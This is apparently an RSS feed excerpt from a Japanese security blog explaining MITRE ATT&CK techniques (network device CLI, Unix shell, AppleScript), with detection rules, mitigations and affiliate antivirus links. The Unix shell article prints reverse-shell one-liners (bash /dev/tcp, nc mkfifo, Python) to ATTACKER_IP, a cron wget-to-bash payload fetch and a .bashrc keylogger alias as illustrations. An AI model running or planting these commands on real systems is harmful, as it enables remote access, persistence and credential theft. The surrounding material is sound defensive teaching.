<h2 class="wp-block-heading"><span id="toc16">緩和策・防御方法</span></h2>
<!-- /wp:heading -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading"><span id="toc17">AAA（認証・認可・アカウンティング）の徹底</span></h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>ネットワーク機器へのアクセスには、TACACS+またはRADIUSを用いた集中管理型の認証基盤を導入します。ローカルアカウントの使用を最小限にし、多要素認証（MFA）の導入も検討してください。ロールベースアクセス制御（RBAC）により、各管理者に必要最小限の権限のみを付与します。</p>
<!-- /wp:paragraph -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading"><span id="toc18">ファームウェア整合性の確保</span></h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>ネットワーク機器のファームウェアは、メーカー公式サイトから取得したものを使用し、インストール前にハッシュ値を検証します。Cisco Secure Boot、Juniper Secure Bootなどのセキュアブート機能を有効にし、不正なファームウェアの読み込みを防止します。定期的なファームウェアアップデートにより既知の脆弱性を解消することも重要です。</p>
<!-- /wp:paragraph -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading"><span id="toc19">ネットワークセグメンテーション</span></h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>管理用ネットワーク（Out-of-Band Management）を分離し、ネットワーク機器への管理アクセスは専用の管理セグメントからのみ許可します。VTY回線にACLを適用し、許可されたIPアドレスからのみSSH接続を受け付けるようにします。Telnetの使用は完全に廃止し、SSHのみに統一してください。</p>
<!-- /wp:paragraph -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading"><span id="toc20">構成管理とバージョン管理</span></h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>RANCID、Oxidized、Ansible Networkなどの構成管理ツールを導入し、ネットワーク機器の設定をバージョン管理します。定期的に設定のバックアップを取得し、承認されていない変更が行われた場合にアラートを発報する仕組みを構築しましょう。構成のドリフト（意図しない変更）を自動検出する体制が理想的です。</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading"><span id="toc21">おすすめセキュリティ対策ツール</span></h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>本記事で紹介した対策を実施するうえで役立つ製品をご紹介します。</p>
<!-- /wp:paragraph -->

<!-- wp:quote -->
<blockquote class="wp-block-quote">
<p><strong>🛡️ まず今日から始めるなら：エンドポイント保護ソフトの導入</strong><br>
ネットワーク機器への攻撃と併せて、エンドポイントの防御も重要です。信頼性の高いセキュリティソフトの導入を強くお勧めします。</p>
</blockquote>
<!-- /wp:quote -->

<!-- wp:list -->
<ul class="wp-block-list">
<li><a rel="nofollow sponsored noopener" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+22F7EA+4OQ4+5YRHE" target="_blank"><strong>ESET（イーセット）</strong></a> — 誤検知が少なく軽量。中小企業に人気のコスパ重視セキュリティソフト ※PR</li>
<li><a rel="nofollow sponsored noopener" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+23M2LU+5AZU+61Z81" target="_blank"><strong>ウイルスバスター</strong></a> — 日本語サポートが充実。国産ソフトで中小企業導入実績多数 ※PR</li>
<li><a rel="nofollow sponsored noopener" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+230N02+3VKO+5YRHE" target="_blank"><strong>Norton（ノートン）</strong></a> — 世界最大手のセキュリティベンダー。VPN機能も含む総合対策 ※PR</li>
</ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading"><span id="toc22">まとめ</span></h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>MITRE ATT&#038;CK T1059.008「Network Device CLI」は、ネットワーク機器のCLIを悪用した攻撃手法です。本記事のポイントを整理します。</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list">
<li><strong>ネットワーク機器は監視の盲点になりやすい</strong>：EDRやアンチウイルスが動作しないため、攻撃者にとって魅力的な標的です</li>
<li><strong>TCLスクリプトなどの正規機能が悪用される</strong>：正規のCLI機能を利用するため、通常のマルウェア検知では発見できません</li>
<li><strong>APT33やTurlaなどの国家支援型グループが活用</strong>：高度な攻撃グループがネットワーク機器を標的としています</li>
<li><strong>検知にはSyslog・TACACS+・NetFlowの組み合わせが有効</strong>：単一の検知手段では不十分であり、多層的な監視が必要です</li>
<li><strong>AAA・ファームウェア整合性・セグメンテーションで防御</strong>：基本的なセキュリティ対策の徹底が最も効果的な防御策です</li>
</ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>ネットワーク機器のセキュリティは、組織のネットワーク全体の安全性を左右します。本記事の内容を参考に、自組織のネットワーク機器のセキュリティ体制を見直してみてください。</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading"><span id="toc23">参考リンク</span></h2>
<!-- /wp:heading -->

<!-- wp:list -->
<ul class="wp-block-list">
<li><a rel="noopener" href="https://attack.mitre.org/techniques/T1059/008/" target="_blank">MITRE ATT&#038;CK T1059.008 &#8211; Network Device CLI</a></li>
<li><a rel="noopener" href="https://www.ipa.go.jp/security/" target="_blank">IPA 独立行政法人 情報処理推進機構 セキュリティセンター</a></li>
<li><a rel="noopener" href="https://www.jpcert.or.jp/" target="_blank">JPCERT/CC（一般社団法人JPCERTコーディネーションセンター）</a></li>
<li><a rel="noopener" href="https://sec.cloudapps.cisco.com/security/center/resources/integrity_assurance.html" target="_blank">Cisco IOS Software Integrity Assurance</a></li>
<li><a rel="noopener" href="https://www.nisc.go.jp/" target="_blank">内閣サイバーセキュリティセンター（NISC）</a></li>
</ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>Based on MITRE ATT&#038;CK® v16, © The MITRE Corporation. Licensed under Apache License 2.0.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>※本サイトはMITRE非公式の解説サイトです</p>
<!-- /wp:paragraph -->
<p>The post <a href="https://ai-sec-review.com/mitre-attck-t1059-008-network-device-cli/">T1059.008 ネットワーク機器CLI（Network Device CLI）を悪用した攻撃手法と検知方法【MITRE ATT&#038;CK】</a> appeared first on <a href="https://ai-sec-review.com">AI Security Review</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ai-sec-review.com/mitre-attck-t1059-008-network-device-cli/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>T1059.004 Unix Shell（bash/sh）を悪用した攻撃手法と検知方法【MITRE ATT&#038;CK】</title>
		<link>https://ai-sec-review.com/mitre-attck-t1059-004-unix-shell/</link>
					<comments>https://ai-sec-review.com/mitre-attck-t1059-004-unix-shell/#respond</comments>
		
		<dc:creator><![CDATA[]]></dc:creator>
		<pubDate>Wed, 25 Mar 2026 20:07:35 +0000</pubDate>
				<category><![CDATA[Execution]]></category>
		<category><![CDATA[T1059]]></category>
		<category><![CDATA[bash]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[MITRE ATT&CK]]></category>
		<category><![CDATA[T1059.004]]></category>
		<category><![CDATA[Unix Shell]]></category>
		<guid isPermaLink="false">https://ai-sec-review.com/mitre-attck-t1059-004-unix-shell-2/</guid>

					<description><![CDATA[<p>※本記事にはアフィリエイトリンクが含まれます。詳しくはプライバシーポリシー・広告掲載についてをご覧ください。 MITRE ATT&#38;CK T1059.004「Unix Shell」は、攻撃者がLinuxやmacOS [&#8230;]</p>
<p>The post <a href="https://ai-sec-review.com/mitre-attck-t1059-004-unix-shell/">T1059.004 Unix Shell（bash/sh）を悪用した攻撃手法と検知方法【MITRE ATT&#038;CK】</a> appeared first on <a href="https://ai-sec-review.com">AI Security Review</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>※本記事にはアフィリエイトリンクが含まれます。詳しくは<a href="https://ai-sec-review.com/disclosure/">プライバシーポリシー・広告掲載について</a>をご覧ください。</p>



<p>MITRE ATT&amp;CK T1059.004「Unix Shell」は、攻撃者がLinuxやmacOS環境で標準搭載されているbash・sh・zshなどのUnixシェルを悪用して不正なコマンドを実行する攻撃手法です。Unixシェルはほぼすべてのサーバーやワークステーションにプリインストールされており、管理者が日常的に使うツールであるため、攻撃の痕跡が正規の操作に紛れやすいという特徴があります。本記事では、T1059.004の定義から具体的な攻撃手法、実際のAPTグループによる悪用事例、そして検知・防御方法まで包括的に解説します。</p>




  <div id="toc" class="toc tnt-number toc-center tnt-number border-element"><input type="checkbox" class="toc-checkbox" id="toc-checkbox-6" checked><label class="toc-title" for="toc-checkbox-6">目次</label>
    <div class="toc-content">
    <ol class="toc-list open"><li><a href="#toc1" tabindex="0">T1059.004 Unix Shellとは？（MITRE ATT&amp;CK定義）</a></li><li><a href="#toc2" tabindex="0">攻撃者がUnix Shellを悪用する理由</a><ol><li><a href="#toc3" tabindex="0">あらゆるシステムに標準搭載されている</a></li><li><a href="#toc4" tabindex="0">強力なスクリプティング機能</a></li><li><a href="#toc5" tabindex="0">正規の管理操作との区別が困難</a></li><li><a href="#toc6" tabindex="0">バックドアと永続化が容易</a></li></ol></li><li><a href="#toc7" tabindex="0">シェルスクリプトによるバックドア・永続化の手法</a><ol><li><a href="#toc8" tabindex="0">crontabを利用した永続化</a></li><li><a href="#toc9" tabindex="0">.bashrc / .profileを利用した永続化</a></li><li><a href="#toc10" tabindex="0">リバースシェルの手法</a></li></ol></li><li><a href="#toc11" tabindex="0">実際の攻撃グループによるUnix Shell悪用事例</a><ol><li><a href="#toc12" tabindex="0">APT32（OceanLotus）</a></li><li><a href="#toc13" tabindex="0">TeamTNT</a></li><li><a href="#toc14" tabindex="0">Rocke Group</a></li><li><a href="#toc15" tabindex="0">Lazarus Group</a></li></ol></li><li><a href="#toc16" tabindex="0">Unix Shell攻撃の検知方法</a><ol><li><a href="#toc17" tabindex="0">auditdによるコマンド実行監視</a></li><li><a href="#toc18" tabindex="0">Syslog・bash履歴の監視</a></li><li><a href="#toc19" tabindex="0">EDR（Endpoint Detection and Response）の活用</a></li></ol></li><li><a href="#toc20" tabindex="0">Unix Shell攻撃への緩和策</a><ol><li><a href="#toc21" tabindex="0">制限付きシェル（Restricted Shell）の導入</a></li><li><a href="#toc22" tabindex="0">AppArmor / SELinuxによるアクセス制御</a></li><li><a href="#toc23" tabindex="0">スクリプトのホワイトリスト化</a></li><li><a href="#toc24" tabindex="0">ネットワークレベルの対策</a></li></ol></li><li><a href="#toc25" tabindex="0">関連するATT&amp;CKテクニック</a></li><li><a href="#toc26" tabindex="0">おすすめセキュリティ対策ツール</a></li><li><a href="#toc27" tabindex="0">まとめ</a></li><li><a href="#toc28" tabindex="0">参考リンク</a></li></ol>
    </div>
  </div>

<h2 class="wp-block-heading"><span id="toc1">T1059.004 Unix Shellとは？（MITRE ATT&amp;CK定義）</span></h2>



<p>MITRE ATT&amp;CKフレームワークにおけるT1059.004は、<a href="https://ai-sec-review.com/mitre-attck-t1059-command-scripting-interpreter/">T1059 Command and Scripting Interpreter</a>のサブテクニックの一つです。攻撃者がUnixシェル（bash、sh、zsh、csh、tcshなど）を利用して、ターゲットシステム上でコマンドやスクリプトを実行する手法を指します。</p>



<p>Unixシェルは、Linux・macOS・BSD系OSに標準搭載されるコマンドラインインタプリタであり、ファイル操作、プロセス管理、ネットワーク通信など、OSのほぼすべての機能にアクセスできます。攻撃者はこの強力な機能を悪用し、初期侵入後のペイロード実行から永続化、データ窃取まで多様な目的に利用します。</p>



<p>MITRE ATT&amp;CKの公式定義は、<a rel="noopener" href="https://attack.mitre.org/techniques/T1059/004/" target="_blank">MITRE ATT&amp;CK T1059.004 Unix Shell</a>をご参照ください。</p>



<h2 class="wp-block-heading"><span id="toc2">攻撃者がUnix Shellを悪用する理由</span></h2>



<h3 class="wp-block-heading"><span id="toc3">あらゆるシステムに標準搭載されている</span></h3>



<p>bashやshは、Linuxディストリビューション・macOS・コンテナイメージなどほぼすべてのUnix系環境に標準でインストールされています。攻撃者は追加のツールをダウンロードすることなく、侵入直後からシェルを利用して偵察やラテラルムーブメントを実行できます。</p>



<h3 class="wp-block-heading"><span id="toc4">強力なスクリプティング機能</span></h3>



<p>シェルスクリプトは、変数・条件分岐・ループ・関数・パイプラインなど高度なプログラミング機能を備えています。攻撃者はこれらを組み合わせて、システム偵察スクリプト、データ収集ツール、自動化されたエクスプロイトチェーンを容易に構築できます。</p>



<h3 class="wp-block-heading"><span id="toc5">正規の管理操作との区別が困難</span></h3>



<p>システム管理者が日常的にシェルを使用するため、攻撃者のシェル操作が正規の管理操作に紛れやすくなります。単純なログ監視だけでは、悪意のあるコマンド実行と正常な管理操作を区別することが難しいのが現状です。</p>



<h3 class="wp-block-heading"><span id="toc6">バックドアと永続化が容易</span></h3>



<p>シェルスクリプトをcrontabや.bashrc、systemdサービスに仕込むことで、攻撃者はシステム再起動後も持続するバックドアを簡単に設置できます。これらの設定ファイルは管理者が頻繁に確認するものではないため、長期間検知されないリスクがあります。</p>




<h2 class="wp-block-heading"><span id="toc7">シェルスクリプトによるバックドア・永続化の手法</span></h2>



<h3 class="wp-block-heading"><span id="toc8">crontabを利用した永続化</span></h3>



<p>攻撃者はcrontabにリバースシェルを登録し、定期的にC2サーバーへの接続を試みます。以下は典型的な手法です：</p>



<pre class="wp-block-code"><code># 攻撃者がcrontabに仕込むリバースシェルの例
*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'

# 別の手法：wgetでスクリプトをダウンロードして実行
*/10 * * * * wget -q -O- http://ATTACKER_DOMAIN/payload.sh | bash</code></pre>



<p>このようなcrontabエントリは、<code>crontab -l</code>で確認できますが、各ユーザーのcrontabを定期的に監査していなければ見逃される可能性があります。</p>



<h3 class="wp-block-heading"><span id="toc9">.bashrc / .profileを利用した永続化</span></h3>



<p>攻撃者はユーザーのシェル初期化ファイル（.bashrc、.bash_profile、.profile、.zshrc）に悪意のあるコードを追記します。ユーザーがログインするたびにバックドアコードが自動実行されます。</p>



<pre class="wp-block-code"><code># .bashrcに追記されるバックドアの例
export PATH="/tmp/.hidden_bin:$PATH"
# 一見無害なエイリアスに偽装
alias sudo='function _sudo(){ /tmp/.keylogger "$@"; command sudo "$@"; };_sudo'</code></pre>



<h3 class="wp-block-heading"><span id="toc10">リバースシェルの手法</span></h3>



<p>Unixシェルを利用した代表的なリバースシェル手法は多数存在します：</p>



<pre class="wp-block-code"><code># bashによるリバースシェル
bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1

# パイプを使ったリバースシェル
mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc ATTACKER_IP PORT > /tmp/f

# Pythonを経由したシェル起動（T1059.006との組み合わせ）
python3 -c 'import os; os.system("/bin/bash -c \"bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1\"")'</code></pre>



<p>Python経由のシェル起動については、<a href="https://ai-sec-review.com/t1059-006-python%e3%82%92%e6%82%aa%e7%94%a8%e3%81%97%e3%81%9f%e6%94%bb%e6%92%83%e6%89%8b%e6%b3%95%e3%81%a8%e6%a4%9c%e7%9f%a5%e6%96%b9%e6%b3%95%e3%80%90mitre-attck%e3%80%91/">T1059.006 Pythonを悪用した攻撃手法と検知方法</a>もあわせてご覧ください。</p>



<h2 class="wp-block-heading"><span id="toc11">実際の攻撃グループによるUnix Shell悪用事例</span></h2>



<p>複数のAPTグループがUnixシェルを攻撃ツールチェーンの中核として利用しています。</p>



<h3 class="wp-block-heading"><span id="toc12">APT32（OceanLotus）</span></h3>



<p>ベトナムに関連するとされるAPT32は、Linuxサーバーへの侵入後にbashスクリプトを利用してバックドアの設置やデータ収集を実行することが確認されています。シェルスクリプトでシステム情報を収集し、C2サーバーへ送信する手法が報告されています。</p>



<h3 class="wp-block-heading"><span id="toc13">TeamTNT</span></h3>



<p>クラウド環境を標的とするTeamTNTは、bashスクリプトを多用してDockerコンテナやKubernetes環境に侵入します。クリプトマイナーの設置、SSHキーの窃取、ラテラルムーブメントのすべてをシェルスクリプトで自動化していることが特徴です。</p>



<h3 class="wp-block-heading"><span id="toc14">Rocke Group</span></h3>



<p>クリプトジャッキングで知られるRocke Groupは、bashスクリプトを使用してセキュリティソフトの無効化、競合するマイナーの停止、自身のマイナーのインストールを一連のスクリプトで実行します。crontabを利用した永続化も確認されています。</p>



<h3 class="wp-block-heading"><span id="toc15">Lazarus Group</span></h3>



<p>北朝鮮に関連するLazarus Groupは、LinuxおよびmacOS環境でシェルスクリプトを使用した攻撃を展開しています。初期侵入後のペイロードダウンロードやシステム偵察にbashコマンドを使用する事例が複数報告されています。</p>



<h2 class="wp-block-heading"><span id="toc16">Unix Shell攻撃の検知方法</span></h2>



<h3 class="wp-block-heading"><span id="toc17">auditdによるコマンド実行監視</span></h3>



<p>Linuxのauditdフレームワークは、execveシステムコールを監視することで、すべてのコマンド実行を記録できます。</p>



<pre class="wp-block-code"><code># /etc/audit/audit.rules に追加
-a always,exit -F arch=b64 -S execve -k shell_exec
-a always,exit -F arch=b32 -S execve -k shell_exec

# bash実行の監視
-w /bin/bash -p x -k bash_execution
-w /bin/sh -p x -k sh_execution
-w /bin/zsh -p x -k zsh_execution</code></pre>



<p>auditdのログは<code>/var/log/audit/audit.log</code>に出力され、<code>ausearch</code>コマンドで検索可能です。SIEM（Security Information and Event Management）と連携することで、異常なシェル実行パターンをリアルタイムに検知できます。</p>



<h3 class="wp-block-heading"><span id="toc18">Syslog・bash履歴の監視</span></h3>



<p>bashの履歴機能を強化することで、攻撃者のコマンド操作を記録・追跡できます。</p>



<pre class="wp-block-code"><code># /etc/profile.d/bash_audit.sh に設定
export HISTTIMEFORMAT="%F %T "
export HISTSIZE=100000
export HISTFILESIZE=100000
shopt -s histappend
export PROMPT_COMMAND='history -a; logger -t bash -p auth.info "user=$(whoami) cmd=$(history 1)"'</code></pre>



<p>上記の設定により、すべてのbashコマンドがsyslogに転送され、集中ログ管理サーバーで監視できるようになります。ただし、攻撃者が<code>unset HISTFILE</code>や<code>HISTSIZE=0</code>を実行して履歴を無効化する可能性があるため、auditdとの併用が推奨されます。</p>



<h3 class="wp-block-heading"><span id="toc19">EDR（Endpoint Detection and Response）の活用</span></h3>



<p>Linux対応のEDR製品は、プロセスの親子関係やコマンドライン引数を分析し、不審なシェル実行を検知します。特に以下のパターンは高い確度で攻撃を示唆します：</p>



<ul class="wp-block-list">
<li>Webサーバープロセス（apache、nginx）からのシェル起動</li>
<li><code>/dev/tcp/</code>を含むbashコマンドの実行</li>
<li>base64デコード後のシェル実行（<code>echo ... | base64 -d | bash</code>）</li>
<li>一時ディレクトリ（/tmp、/dev/shm）からのスクリプト実行</li>
<li>通常と異なるユーザーアカウントからのシェル起動</li>
</ul>



<h2 class="wp-block-heading"><span id="toc20">Unix Shell攻撃への緩和策</span></h2>



<h3 class="wp-block-heading"><span id="toc21">制限付きシェル（Restricted Shell）の導入</span></h3>



<p>rbash（restricted bash）を利用することで、ユーザーが実行できるコマンドやアクセスできるディレクトリを制限できます。サービスアカウントには必要最小限の権限のシェルを割り当てることが重要です。シェルが不要なアカウントには<code>/sbin/nologin</code>や<code>/bin/false</code>を設定しましょう。</p>



<h3 class="wp-block-heading"><span id="toc22">AppArmor / SELinuxによるアクセス制御</span></h3>



<p>MAC（Mandatory Access Control）フレームワークを活用することで、プロセスがアクセスできるファイルやネットワーク接続を厳密に制御できます。Webサーバーやアプリケーションサーバーのプロファイルを適切に設定し、不要なシェル起動を防止することが効果的です。</p>



<pre class="wp-block-code"><code># AppArmorプロファイルの例（Webサーバーからのシェル実行を禁止）
/usr/sbin/nginx {
  # シェルの実行を拒否
  deny /bin/bash rx,
  deny /bin/sh rx,
  deny /bin/dash rx,
  deny /bin/zsh rx,
}</code></pre>



<h3 class="wp-block-heading"><span id="toc23">スクリプトのホワイトリスト化</span></h3>



<p>fapolicyd（File Access Policy Daemon）やIMA（Integrity Measurement Architecture）を利用して、承認済みのスクリプトのみ実行を許可する仕組みを構築できます。信頼されたスクリプトにのみ実行権限を付与し、未知のスクリプトの実行を検知・ブロックすることで、攻撃者が持ち込んだスクリプトの実行を防止します。</p>



<h3 class="wp-block-heading"><span id="toc24">ネットワークレベルの対策</span></h3>



<p>リバースシェルの多くはアウトバウンド接続を利用するため、egress（出口）フィルタリングが有効です。サーバーからのアウトバウンド接続を必要最小限のIPアドレス・ポートに制限することで、リバースシェルの確立を防止できます。</p>



<h2 class="wp-block-heading"><span id="toc25">関連するATT&amp;CKテクニック</span></h2>



<p>Unix Shell攻撃は、他のATT&amp;CKテクニックと組み合わせて使用されることが多いです。関連テクニックも理解しておきましょう。</p>



<ul class="wp-block-list">
<li><a href="https://ai-sec-review.com/mitre-attck-t1059-command-scripting-interpreter/">T1059 Command and Scripting Interpreter</a>（親テクニック）</li>
<li><a href="https://ai-sec-review.com/mitre-attck-t1059-001-powershell/">T1059.001 PowerShell</a> — Windows環境での同等の攻撃手法</li>
<li><a href="https://ai-sec-review.com/t1059-006-python%e3%82%92%e6%82%aa%e7%94%a8%e3%81%97%e3%81%9f%e6%94%bb%e6%92%83%e6%89%8b%e6%b3%95%e3%81%a8%e6%a4%9c%e7%9f%a5%e6%96%b9%e6%b3%95%e3%80%90mitre-attck%e3%80%91/">T1059.006 Python</a> — Python経由でシェルを起動する手法との連携</li>
</ul>



<h2 class="wp-block-heading"><span id="toc26">おすすめセキュリティ対策ツール</span></h2>



<p>本記事で紹介した対策を実施するうえで役立つ製品をご紹介します。</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p><strong>🛡️ まず今日から始めるなら：エンドポイント保護ソフトの導入</strong><br>
Unix Shellを悪用したLinux/macOS攻撃を検知するために、信頼性の高いセキュリティソフトの導入を強くお勧めします。</p>
</blockquote>



<ul class="wp-block-list">
<li><a rel="nofollow sponsored noopener" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+22F7EA+4OQ4+5YRHE" target="_blank"><strong>ESET（イーセット）</strong></a> — 誤検知が少なく軽量。中小企業に人気のコスパ重視セキュリティソフト ※PR</li>
<li><a rel="nofollow sponsored noopener" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+23M2LU+5AZU+61Z81" target="_blank"><strong>ウイルスバスター</strong></a> — 日本語サポートが充実。国産ソフトで中小企業導入実績多数 ※PR</li>
<li><a rel="nofollow sponsored noopener" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+230N02+3VKO+5YRHE" target="_blank"><strong>Norton（ノートン）</strong></a> — 世界最大手のセキュリティベンダー。VPN機能も含む総合対策 ※PR</li>
</ul>



<p>※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。</p>



<h2 class="wp-block-heading"><span id="toc27">まとめ</span></h2>



<p>T1059.004 Unix Shellは、Linux/macOS環境における最も基本的かつ広く悪用される攻撃手法の一つです。以下のポイントを押さえて対策を進めましょう。</p>



<ul class="wp-block-list">
<li><strong>bashやshはほぼすべてのUnix系OSに搭載</strong>されており、攻撃者は追加ツールなしでコマンド実行が可能</li>
<li><strong>crontab・.bashrc・systemdを利用した永続化</strong>が容易であり、定期的な監査が不可欠</li>
<li><strong>auditdによるexecve監視</strong>とbash履歴のsyslog転送を組み合わせた多層的な検知が有効</li>
<li><strong>AppArmor/SELinuxによるMAC</strong>でWebサーバー等からのシェル起動を制限し、攻撃面を縮小</li>
<li><strong>egress フィルタリング</strong>でリバースシェルの確立を防止し、侵害の拡大を阻止</li>
</ul>



<p>Based on MITRE ATT&amp;CK® v16, © The MITRE Corporation. Licensed under Apache License 2.0.</p>



<p>※本サイトはMITRE非公式の解説サイトです</p>



<h2 class="wp-block-heading"><span id="toc28">参考リンク</span></h2>



<ul class="wp-block-list">
<li><a rel="noopener" href="https://attack.mitre.org/techniques/T1059/004/" target="_blank">MITRE ATT&amp;CK T1059.004 Unix Shell</a></li>
<li><a rel="noopener" href="https://www.ipa.go.jp/security/" target="_blank">IPA 情報セキュリティ</a></li>
<li><a rel="noopener" href="https://www.jpcert.or.jp/" target="_blank">JPCERT/CC</a></li>
<li><a rel="noopener" href="https://www.nisc.go.jp/" target="_blank">内閣サイバーセキュリティセンター（NISC）</a></li>
</ul>



<hr class="wp-block-separator has-alpha-channel-opacity"/>



<p style="color:#64748b;font-size:0.85rem">Based on MITRE ATT&#038;CK® v16, © The MITRE Corporation. Licensed under Apache License 2.0.<br>本ページは非公式翻訳・解説です。正確な情報は<a rel="noopener" href="https://attack.mitre.org/" target="_blank">MITRE公式サイト</a>をご参照ください。</p>
<p>The post <a href="https://ai-sec-review.com/mitre-attck-t1059-004-unix-shell/">T1059.004 Unix Shell（bash/sh）を悪用した攻撃手法と検知方法【MITRE ATT&#038;CK】</a> appeared first on <a href="https://ai-sec-review.com">AI Security Review</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ai-sec-review.com/mitre-attck-t1059-004-unix-shell/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>T1059.002 AppleScriptを悪用した攻撃手法と検知方法【MITRE ATT&#038;CK】</title>
		<link>https://ai-sec-review.com/mitre-attck-t1059-002-applescript/</link>
					<comments>https://ai-sec-review.com/mitre-attck-t1059-002-applescript/#respond</comments>
		
		<dc:creator><![CDATA[]]></dc:creator>
		<pubDate>Wed, 25 Mar 2026 20:06:50 +0000</pubDate>
				<category><![CDATA[Execution]]></category>
		<category><![CDATA[T1059]]></category>
		<category><![CDATA[AppleScript]]></category>
		<category><![CDATA[macOS]]></category>
		<category><![CDATA[MITRE ATT&CK]]></category>
		<category><![CDATA[T1059.002]]></category>
		<guid isPermaLink="false">https://ai-sec-review.com/mitre-attck-t1059-002-applescript-2/</guid>

					<description><![CDATA[<p>※本記事にはアフィリエイトリンクが含まれます。詳しくはプライバシーポリシー・広告掲載についてをご覧ください。 AppleScriptはmacOSに標準搭載されているスクリプト言語で、アプリケーション間のIPC（プロセス間 [&#8230;]</p>
<p>The post <a href="https://ai-sec-review.com/mitre-attck-t1059-002-applescript/">T1059.002 AppleScriptを悪用した攻撃手法と検知方法【MITRE ATT&#038;CK】</a> appeared first on <a href="https://ai-sec-review.com">AI Security Review</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>※本記事にはアフィリエイトリンクが含まれます。詳しくは<a href="https://ai-sec-review.com/disclosure/">プライバシーポリシー・広告掲載について</a>をご覧ください。</p>



<p>AppleScriptはmacOSに標準搭載されているスクリプト言語で、アプリケーション間のIPC（プロセス間通信）を通じてシステム操作を自動化できる強力な機能を持っています。しかし、この便利な機能は攻撃者にとっても格好のツールとなっています。MITRE ATT&amp;CKフレームワークではT1059.002として分類されるAppleScriptの悪用は、macOS環境を狙う高度な攻撃グループによって実際に利用されています。本記事では、AppleScriptを悪用した攻撃手法の仕組み、実際のAPT事例、そして効果的な検知・緩和策を詳しく解説します。</p>



<p>Based on MITRE ATT&amp;CK® v16, © The MITRE Corporation. Licensed under Apache License 2.0.<br>※本サイトはMITRE非公式の解説サイトです。公式情報は<a rel="noopener" href="https://attack.mitre.org/techniques/T1059/002/" target="_blank">MITRE ATT&amp;CK公式サイト</a>をご確認ください。</p>




  <div id="toc" class="toc tnt-number toc-center tnt-number border-element"><input type="checkbox" class="toc-checkbox" id="toc-checkbox-8" checked><label class="toc-title" for="toc-checkbox-8">目次</label>
    <div class="toc-content">
    <ol class="toc-list open"><li><a href="#toc1" tabindex="0">T1059.002 AppleScriptとは？MITRE ATT&amp;CKの定義</a><ol><li><a href="#toc2" tabindex="0">ATT&amp;CKにおける位置づけ</a></li></ol></li><li><a href="#toc3" tabindex="0">攻撃者がAppleScriptを悪用する理由</a><ol><li><a href="#toc4" tabindex="0">osascriptコマンドの悪用</a></li><li><a href="#toc5" tabindex="0">IPC（プロセス間通信）機能の悪用</a></li></ol></li><li><a href="#toc6" tabindex="0">実際の攻撃事例：APTグループによるAppleScript悪用</a><ol><li><a href="#toc7" tabindex="0">OceanLotus（APT32）</a></li><li><a href="#toc8" tabindex="0">Lazarus Group</a></li><li><a href="#toc9" tabindex="0">その他の事例</a></li></ol></li><li><a href="#toc10" tabindex="0">検知方法：AppleScript悪用を見抜く</a><ol><li><a href="#toc11" tabindex="0">プロセス監視（osascriptの実行検知）</a></li><li><a href="#toc12" tabindex="0">Syslog・統合ログによる監視</a></li><li><a href="#toc13" tabindex="0">EDR（Endpoint Detection and Response）の活用</a></li></ol></li><li><a href="#toc14" tabindex="0">緩和策：AppleScript悪用を防ぐ</a><ol><li><a href="#toc15" tabindex="0">macOS標準のセキュリティ機能の活用</a></li><li><a href="#toc16" tabindex="0">MDM（モバイルデバイス管理）による制御</a></li><li><a href="#toc17" tabindex="0">運用面での対策</a></li></ol></li><li><a href="#toc18" tabindex="0">おすすめセキュリティ対策ツール</a></li><li><a href="#toc19" tabindex="0">まとめ</a></li><li><a href="#toc20" tabindex="0">参考リンク</a></li></ol>
    </div>
  </div>

<h2 class="wp-block-heading"><span id="toc1">T1059.002 AppleScriptとは？MITRE ATT&amp;CKの定義</span></h2>



<p>MITRE ATT&amp;CKにおけるT1059.002は、「Command and Scripting Interpreter: AppleScript」として定義される攻撃テクニックです。これは<a href="https://ai-sec-review.com/mitre-attck-t1059-command-scripting-interpreter/">T1059 コマンドおよびスクリプトインタプリタ</a>のサブテクニックの一つで、攻撃者がmacOS環境でAppleScriptを利用してコマンドを実行する手法を指します。</p>



<p>AppleScriptはmacOS（旧Mac OS X）に標準搭載されているスクリプト言語であり、OSが提供するApple Eventsという仕組みを利用してアプリケーション間通信を実現します。攻撃者は<code>osascript</code>コマンドラインユーティリティを通じて、あるいはスクリプトファイルを直接実行して悪意のあるコードを実行できます。</p>



